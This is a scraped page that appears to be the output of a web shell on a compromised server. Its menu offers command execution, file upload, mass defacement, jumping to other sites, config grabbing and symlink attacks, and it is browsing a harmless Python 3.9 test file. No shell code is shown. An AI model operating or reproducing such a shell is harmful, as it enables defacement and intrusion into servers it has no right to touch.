OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/../var/../python/lib/python3.9/test/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
"""This is a test""" from __future__ import nested_scopes; import site def f(x): def g(y): return x + y return g result = f(2)(4)